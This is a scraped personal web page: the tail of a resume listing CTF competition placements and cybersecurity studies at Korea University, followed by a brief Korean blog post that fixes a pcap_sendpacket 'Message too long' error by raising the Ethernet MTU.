2025 DEFCON 33 final | 10th | "Cold Fusion"
2025 HITCON CTF | 4th | "CTF Demon Hunters"

Education

Korea University
- Studying engineering in cyber defense | GPA 4.15 / 4.5 (2020.03 - 2024.02) | defer graduation for two years (2026.02)

2025.08.29. updated

pcap_sendpacket return -1 error=send: Message too long 해결?

gss1 — Tue, 5 Oct 2021 16:58:09 +0900

https://zetawiki.com/wiki/%EB%A6%AC%EB%88%85%EC%8A%A4_%EC%9D%B4%EB%8D%94%EB%84%B7_MTU_%EB%B3%80%EA%B2%BD

리눅스 이더넷 MTU 변경 - 제타위키

다음 문자열 포함...

zetawiki.com

MTU를 크게 하니까 안뜬다..